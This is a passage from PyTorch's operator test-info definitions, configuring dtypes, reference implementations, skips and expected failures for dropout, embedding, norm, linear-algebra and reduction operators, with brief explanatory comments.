DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.complex64, torch.float32,)), # noqa: B950 )), OpInfo( "norm", variant_test_name="inf", sample_inputs_func=sample_inputs_norm_inf, dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=[torch.complex128]), # AssertionError: RuntimeError not raised : Expected RuntimeError when doing an unsafe cast from a result # of dtype torch.float32 into an out= with dtype torch.long DecorateInfo( unittest.expectedFailure, "TestCommon", "test_out", device_type="meta", ), ), ), OpInfo('t', sample_inputs_func=sample_inputs_t, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # vmap does not support inplace views check_inplace_batched_forward_grad=False, autodiff_fusible_nodes=[], # aliases inputs, shouldn't be fused autodiff_nonfusible_nodes=[], # aliases inputs, shouldn't be fused dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), assert_autodiffed=True, error_inputs_func=error_inputs_t), UnaryUfuncInfo('special.erfcx', ref=scipy.special.erfcx if TEST_SCIPY else _NOTHING, aten_name='special_erfcx', decorators=(toleranceOverride({torch.float32: tol(atol=0, rtol=4e-6), }),), dtypes=all_types_and(torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True), OpInfo( "nn.functional.dropout", op=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.dropout, input, *args, **kwargs), ref=_NOTHING, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # Probably because we have used lambda for the op here # AssertionError: JIT Test does not execute any logic DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # 
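# (Pattern note for the dropout entries below, hedged: dropout is random, so
# the op, its inplace variant, and gradcheck are all routed through
# wrapper_set_seed so that repeated invocations see the same mask. A minimal
# sketch of such a helper, assuming it simply reseeds and calls through:
#
#     def wrapper_set_seed(op, *args, **kwargs):
#         torch.manual_seed(42)
#         return op(*args, **kwargs)
# )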
# The inplace variant dispatches to the dropout kernel, while on CUDA # the op dispatches to _fused_dropout (with a few more conditions); # hence the different values, and this skip here DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_neg_view', device_type='cuda'),), gradcheck_wrapper=wrapper_set_seed, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, supports_out=False, sample_inputs_func=sample_inputs_dropout, inplace_variant=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.dropout, input, *args, **kwargs, inplace=True)), OpInfo( "nn.functional.dropout2d", op=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.dropout2d, input, *args, **kwargs), ref=_NOTHING, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # torch.autograd.gradcheck.GradcheckError: While computing batched gradients, got: # vmap: We do not yet support calling random operations inside of vmap. # Please perform random operations outside of vmap as a workaround DecorateInfo(unittest.expectedFailure, 'TestGradients', "test_forward_mode_AD"), DecorateInfo(unittest.expectedFailure, 'TestGradients', "test_inplace_forward_mode_AD"),), gradcheck_wrapper=wrapper_set_seed, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, # As per the docs, valid input dims are (3, 4) sample_inputs_func=partial(sample_inputs_dropout, valid_input_dim=(3, 4)), inplace_variant=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.dropout2d, input, *args, **kwargs, inplace=True)), # In training mode, feature_alpha_dropout currently doesn't support inputs of complex dtype, # unlike when `train=False`, where complex inputs are supported; hence 2 OpInfos to cover both cases OpInfo( "nn.functional.feature_alpha_dropout", op=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.feature_alpha_dropout, input, *args, **kwargs), variant_test_name="with_train", ref=_NOTHING, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # torch.autograd.gradcheck.GradcheckError: While computing batched gradients, got: # vmap: We do not yet support calling random operations inside of vmap.
# Please perform random operations outside of vmap as a workaround DecorateInfo(unittest.expectedFailure, 'TestGradients', "test_forward_mode_AD"), DecorateInfo(unittest.expectedFailure, 'TestGradients', "test_inplace_forward_mode_AD"),), gradcheck_wrapper=wrapper_set_seed, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, # As per the docs, valid input dims are (4, 5) sample_inputs_func=partial(sample_inputs_dropout, train=True, valid_input_dim=(4, 5)), inplace_variant=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.feature_alpha_dropout, input, *args, **kwargs, inplace=True)), OpInfo( "nn.functional.feature_alpha_dropout", op=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.feature_alpha_dropout, input, *args, **kwargs), variant_test_name="without_train", ref=_NOTHING, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'),), gradcheck_wrapper=wrapper_set_seed, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, sample_inputs_func=partial(sample_inputs_dropout, train=False), inplace_variant=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.feature_alpha_dropout, input, *args, **kwargs, inplace=True)), OpInfo( "nn.functional.one_hot", ref=reference_one_hot, supports_out=False, dtypes=_dispatch_dtypes((torch.int64,)), sample_inputs_func=sample_inputs_one_hot, ), OpInfo( "nn.functional.embedding", aten_backward_name="embedding_dense_backward", # We use lambda to reshuffle the positional arguments. # This is because currently only the `input` field of SampleInput # is tested in gradient tests. op=lambda weight, idx, **kwargs: torch.nn.functional.embedding(idx, weight, **kwargs), dtypes=floating_types_and(torch.bfloat16, torch.float16), sample_inputs_func=sample_inputs_embedding, error_inputs_func=error_inputs_embedding, supports_forward_ad=True, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # Reference: https://github.com/pytorch/pytorch/issues/67084 DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_neg_view', device_type='cuda'), # Not a problem: embedding does weird stuff to its input (it renormalizes) DecorateInfo(unittest.skip('Allowed exemption'), 'TestCompositeCompliance', 'test_operator'), ), supports_expanded_weight=True, supports_out=False, ), OpInfo( "nn.functional.embedding_bag", # We use lambda to reshuffle the positional arguments. # This is because currently only the `input` field of SampleInput # is tested in gradient tests. 
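# (Same reshuffling trick as for `where` above, hedged illustration: the
# native signature is embedding(input, weight), but gradient tests only
# differentiate SampleInput.input, so the lambda below takes `weight` first
# and forwards it as torch.nn.functional.embedding(idx, weight, **kwargs).)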
op=lambda weight, idx, **kwargs: torch.nn.functional.embedding_bag(idx, weight, **kwargs), dtypes=floating_types_and(torch.float16), dtypesIfCUDA=floating_types_and(torch.bfloat16, torch.float16), # backward is not supported for mode `max` and dtype `bfloat16` backward_dtypesIfCUDA=floating_types_and(torch.float16), sample_inputs_func=sample_inputs_embedding_bag, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # Not a problem: embedding_bag does weird stuff to its input (it renormalizes) DecorateInfo(unittest.skip('Allowed exemption'), 'TestCompositeCompliance', 'test_operator'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward', device_type='cpu'), ), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, supports_out=False, supports_gradgrad=False, ), UnaryUfuncInfo( "nn.functional.softplus", aten_backward_name='softplus_backward', ref=reference_softplus, sample_kwargs=lambda device, dtype, input: ({'beta': 3, 'threshold': .2}, {'beta': 3, 'threshold': .2}), sample_inputs_func=partial(sample_inputs_elementwise_unary, op_kwargs={'beta': 3, 'threshold': .2}), supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.bfloat16, torch.float16), decorators=( DecorateInfo( toleranceOverride ({ torch.half: tol(atol=1e-2, rtol=1e-2), torch.bfloat16: tol(atol=1e-2, rtol=1e-2), }), 'TestUnaryUfuncs'), ), ), OpInfo( "linalg.tensorinv", ref=np.linalg.tensorinv, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_tensorinv, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[skipCPUIfNoLapack, skipCUDAIfNoMagmaAndNoCusolver], ), OpInfo( "linalg.tensorsolve", ref=lambda a, b, dims=None: np.linalg.tensorsolve(a, b, axes=dims), dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_tensorsolve, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[skipCPUIfNoLapack, skipCUDAIfNoMagma], ), OpInfo( "nn.functional.mse_loss", aten_backward_name='mse_loss_backward', ref=loss_reference_reduction_wrapper(lambda input, target: (input - target) ** 2), sample_inputs_func=sample_inputs_loss, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_types_and(torch.float16), backward_dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.bfloat16, torch.float16), backward_dtypesIfCUDA=floating_types_and(torch.bfloat16, torch.float16), skips=( # RuntimeError: input->type()->kind() == TypeKind::OptionalType # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":252, # please report a bug to PyTorch. 
DecorateInfo(unittest.expectedFailure, "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32,),), ), ), OpInfo( "nn.functional.grid_sample", ref=_NOTHING, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16), supports_out=False, sample_inputs_func=sample_inputs_grid_sample, supports_gradgrad=False, gradcheck_nondet_tol=1e-15), OpInfo( "argwhere", ref=np.argwhere, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_autograd=False, sample_inputs_func=sample_inputs_argwhere, ), ReductionOpInfo( 'all', identity=True, supports_multiple_dims=False, supports_autograd=False, result_dtype=torch.bool, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), ref=reference_reduction_numpy(np.all), skips=( # FIXME: does not support passing keepdim without dim DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_default_keepdim'), # FIXME: does not support dim=None DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_none'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_none_keepdim'), # FIXME: uint8 input returns uint8 instead of bool DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_result_dtype', dtypes=[torch.uint8]), ), ), ReductionOpInfo( 'any', identity=False, supports_multiple_dims=False, supports_autograd=False, result_dtype=torch.bool, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), ref=reference_reduction_numpy(np.any), skips=( # FIXME: does not support passing keepdim without dim DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_default_keepdim'), # FIXME: does not support dim=None DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_none'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_none_keepdim'), # FIXME: uint8 input returns uint8 instead of bool DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_result_dtype', dtypes=[torch.uint8]), ), ), ReductionOpInfo( 'amax', nan_policy='propagate', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), ref=reference_reduction_numpy(np.amax), skips=( # FIXME: reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), ), error_inputs_func=error_inputs_aminmax_amax_amin, ), ReductionOpInfo( 'amin', nan_policy='propagate', dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), ref=reference_reduction_numpy(np.amin), skips=( # FIXME: reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), ), error_inputs_func=error_inputs_aminmax_amax_amin, ), ReductionOpInfo( 'argmax', supports_multiple_dims=False, supports_autograd=False, assert_jit_shape_analysis=True, result_dtype=torch.int64, dtypes=all_types_and(torch.float16, torch.bfloat16), ref=reference_reduction_numpy(np.argmax, supports_keepdims=False), skips=( # FIXME: keepdim parameter is ignored when dim=None DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_default_keepdim'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none_keepdim'), ), ), ReductionOpInfo( 'argmin', supports_multiple_dims=False, supports_autograd=False, result_dtype=torch.int64, dtypes=all_types_and(torch.float16, torch.bfloat16), 
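# (Illustration of the ref wiring used by these ReductionOpInfo entries:
# reference_reduction_numpy adapts a NumPy reduction to torch's calling
# convention, roughly mapping dim -> axis and keepdim -> keepdims, e.g.
#
#     torch.amax(t, dim=0, keepdim=True)  ~  np.amax(a, axis=0, keepdims=True)
#
# np.argmax/np.argmin take no keepdims argument here, hence
# supports_keepdims=False for the argmax/argmin entries.)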
ref=reference_reduction_numpy(np.argmin, supports_keepdims=False), skips=( # FIXME: keepdim parameter is ignored when dim=None DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_default_keepdim'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none_keepdim'), ), ), ReductionOpInfo( 'count_nonzero', identity=0, supports_out=False, supports_autograd=False, result_dtype=torch.int64, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_reduction_count_nonzero, ref=reference_reduction_numpy(np.count_nonzero), skips=( # FIXME: count_nonzero does not accept keepdim kwarg DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_default_keepdim'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none_keepdim'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_single_keepdim'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty_keepdim'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_multi_keepdim'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_multi_unsorted_keepdim'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_offbounds_keepdim'), # FIXME: dim=[] reduces all dimensions DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty'), ), ), ReductionOpInfo( 'mean', nan_policy='propagate', supports_forward_ad=True, supports_fwgrad_bwgrad=True, # FIXME: mean needs 'dim' parameter when using the 'out' overload. # Adding it with 'generate_args_kwargs' does not work, since these also get passed # onto the reference implementations. supports_out=False, assert_autodiffed=True, assert_jit_shape_analysis=True, promotes_int_to_float=True, dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), ref=reference_reduction_numpy(np.mean), error_inputs_func=error_inputs_mean, skips=( # FIXME: mean does not support passing keepdim without passing dim DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_default_keepdim'), # FIXME: mean reduces all dimensions when dim=[] DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty_keepdim'), # FIXME: mean does not support passing None to dim DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none_keepdim'), # FIXME: improve precision DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_small_input', dtypes=[torch.float16]), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_extremal_values', device_type='cuda', dtypes=[torch.complex64]), ), ), ReductionOpInfo( 'nanmean', nan_policy='omit', assert_autodiffed=True, promotes_int_to_float=True, dtypes=floating_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_nan_reduction(supports_multiple_dims=True), ref=reference_reduction_numpy(np.nanmean), skips=( # AssertionError: False is not true : # Failure in testing nodes' autodifferentiation. 
DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # FIXME: nanmean reduces all dimensions when dim=[] DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty_keepdim'), # FIXME: improve precision DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_small_input', dtypes=[torch.float16]), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_duplicate_values', device_type='cuda', dtypes=[torch.float16]), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_extremal_values', device_type='cuda', dtypes=[torch.complex64]), ), ), ReductionOpInfo( 'std', nan_policy='propagate', supports_out=False, complex_to_real=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=True, promotes_int_to_float=True, dtypes=floating_and_complex_types_and(torch.half, torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_std_var, ref=reference_std_var(np.std), generate_args_kwargs=generate_std_var_kwargs, skips=( # FIXME: cannot specify keepdim without dim DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_default_keepdim'), # FIXME: dim=None not supported DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none_keepdim'), # FIXME: dim=[] reduces all dimensions DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty_keepdim'), # FIXME: improve precision DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_small_input'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_duplicate_values'), # NumPy is giving NaN for this DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_large_input'), ), ), ReductionOpInfo( 'var', nan_policy='propagate', supports_out=False, assert_autodiffed=True, promotes_int_to_float=True, complex_to_real=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_and_complex_types_and(torch.half, torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_std_var, ref=reference_std_var(np.var), generate_args_kwargs=generate_std_var_kwargs, skips=( # FIXME: cannot specify keepdim without dim DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_default_keepdim'), # FIXME: dim=None not supported DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none_keepdim'), # FIXME: dim=[] reduces all dimensions DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty_keepdim'), # FIXME: improve precision DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_small_input'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_duplicate_values'), # NumPy is giving NaN for this DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_large_input'), ), ), ReductionOpInfo( 'prod', identity=1, nan_policy='propagate', supports_multiple_dims=False, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, promotes_int_to_int64=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL,
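# (Context for the std/var references above, hedged: torch.std/torch.var
# default to the unbiased sample estimator (Bessel's correction), while
# np.std/np.var default to ddof=0, so roughly
#
#     torch.var(t)  ~  np.var(a, ddof=1)
#
# reference_std_var and generate_std_var_kwargs reconcile the two conventions
# across the tested argument combinations.)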
dtypes=all_types_and_complex_and(torch.bool), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), sample_inputs_func=sample_inputs_prod, ref=reference_reduction_numpy(np.prod), skips=( # FIXME: prod does not support passing keepdim without passing dim DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_default_keepdim'), # FIXME: prod reduces all dimensions when dim=[] DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty_keepdim'), # FIXME: prod does not support passing None to dim DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none_keepdim'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_small_input', dtypes=[torch.float16, torch.complex64]), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_duplicate_values', dtypes=[torch.uint8, torch.float16, torch.complex64]), ), ), ReductionOpInfo( 'sum', identity=0, nan_policy='propagate', supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, promotes_int_to_int64=True, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), ref=reference_reduction_numpy(np.sum), skips=( # FIXME: sum does not support passing keepdim without passing dim DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_default_keepdim'), # FIXME: sum reduces all dimensions when dim=[] DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_empty_keepdim'), # FIXME: sum does not support passing None to dim DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none'), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_dim_none_keepdim'), # FIXME: improve precision DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_small_input', dtypes=[torch.float16]), DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_duplicate_values', dtypes=[torch.float16]), ), ), ReductionOpInfo( 'nansum', identity=0, nan_policy='omit', supports_out=True, promotes_int_to_int64=True, dtypes=all_types_and(torch.bool, torch.float16, torch.bfloat16), ref=reference_reduction_numpy(np.nansum), skips=( # FIXME: nansum reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), # FIXME: flaky test so skipped instead of xfailed # possibly bad low precision reference in numpy DecorateInfo(unittest.skip("Skipped!"), 'TestReductions', 'test_ref_small_input', dtypes=[torch.float16]), ), ), ReductionOpInfo( '_masked.sum', ref=reference_reduction_numpy(np.sum), method_variant=None, identity=0, nan_policy='propagate', supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, promotes_int_to_int64=True, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), skips=( DecorateInfo(unittest.skip("Failing on some jobs"), 'TestReductions', 'test_reference_masked', dtypes=(torch.bool, torch.int8, torch.int16, torch.int32)), DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # 
FIXME: sum reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), # RuntimeError: undefined value tensor DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # see https://github.com/pytorch/pytorch/issues/76227 DecorateInfo(unittest.skip("Fails on UBSAN!"), 'TestCompositeCompliance', 'test_forward_ad', device_type='cpu'), ), decorators=[ DecorateInfo(toleranceOverride({torch.bfloat16: tol(atol=1e-03, rtol=1e-03)}), 'TestReductions', 'test_reference_masked'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-03, rtol=1e-03)}), 'TestReductions', 'test_reference_masked'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-03)}), 'TestReductions', 'test_ref_small_input'), ], sample_inputs_func=sample_inputs_masked_reduction, sample_inputs_sparse_coo_func=sample_inputs_sparse_coo_masked_reduction, sample_inputs_sparse_csr_func=sample_inputs_sparse_csr_masked_reduction ), ReductionOpInfo( '_masked.prod', ref=reference_reduction_numpy(np.prod), method_variant=None, identity=1, nan_policy='propagate', supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, promotes_int_to_int64=True, # FIXME: "prod_cpu" not implemented for 'BFloat16' # FIXME: "prod_cpu" not implemented for 'Half' dtypes=all_types_and_complex_and(torch.bool), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.skip("Failing on some jobs"), 'TestReductions', 'test_reference_masked', dtypes=(torch.bool, torch.int8, torch.int16, torch.int32),), # see https://github.com/pytorch/pytorch/issues/76227 DecorateInfo(unittest.skip("Fails on UBSAN!"), 'TestCompositeCompliance', 'test_forward_ad', device_type='cpu'), # FIXME: "cuda_scatter_gather_base_kernel_func" not implemented for ... (used for sparse_coo inputs) DecorateInfo(unittest.skip("Skipped!"), 'TestMasked', 'test_mask_layout', device_type='cuda', dtypes=(torch.bool, torch.int8, torch.uint8, torch.int16, torch.int32, torch.int64, torch.complex64, torch.complex128)), ), decorators=[ DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-03, rtol=1e-02)}), 'TestReductions', 'test_reference_masked'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-03, rtol=1e-03)}), 'TestReductions', 'test_ref_duplicate_values'), ], sample_inputs_func=sample_inputs_masked_reduction, sample_inputs_sparse_coo_func=sample_inputs_sparse_coo_masked_reduction, sample_inputs_sparse_csr_func=sample_inputs_sparse_csr_masked_reduction, ), OpInfo( '_masked.cumsum', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.float16, torch.bfloat16), method_variant=None, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # NotSupportedError: Compiled functions can't ... 
use keyword-only arguments with defaults DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), ), # Can reuse the same inputs; dim is required in both sample_inputs_func=sample_inputs_masked_cumops, gradcheck_wrapper=gradcheck_wrapper_masked_operation, ), OpInfo( '_masked.cumprod', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.float16, torch.bfloat16), method_variant=None, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # NotSupportedError: Compiled functions can't ... use keyword-only arguments with defaults DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), ), # Can reuse the same inputs; dim is required in both sample_inputs_func=sample_inputs_masked_cumops, gradcheck_wrapper=gradcheck_wrapper_masked_operation, ), ReductionOpInfo( '_masked.amax', nan_policy='propagate', supports_out=False, dtypes=all_types_and(torch.float16, torch.bfloat16), supports_sparse=True, ref=reference_reduction_numpy(np.amax), skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # FIXME: amax reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), # RuntimeError: Unknown builtin op: aten::iinfo DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # FIXME: "cuda_scatter_gather_base_kernel_func" not implemented for ... (used for sparse_coo inputs) DecorateInfo(unittest.skip("Skipped!"), 'TestMasked', 'test_mask_layout', device_type='cuda', dtypes=(torch.bool, torch.int8, torch.uint8, torch.int16, torch.int32, torch.int64, torch.complex64, torch.complex128)), ), sample_inputs_func=sample_inputs_masked_reduction, sample_inputs_sparse_coo_func=sample_inputs_sparse_coo_masked_reduction, gradcheck_wrapper=gradcheck_wrapper_masked_operation ), ReductionOpInfo( '_masked.amin', nan_policy='propagate', supports_out=False, dtypes=all_types_and(torch.float16, torch.bfloat16), supports_sparse=True, ref=reference_reduction_numpy(np.amin), skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), 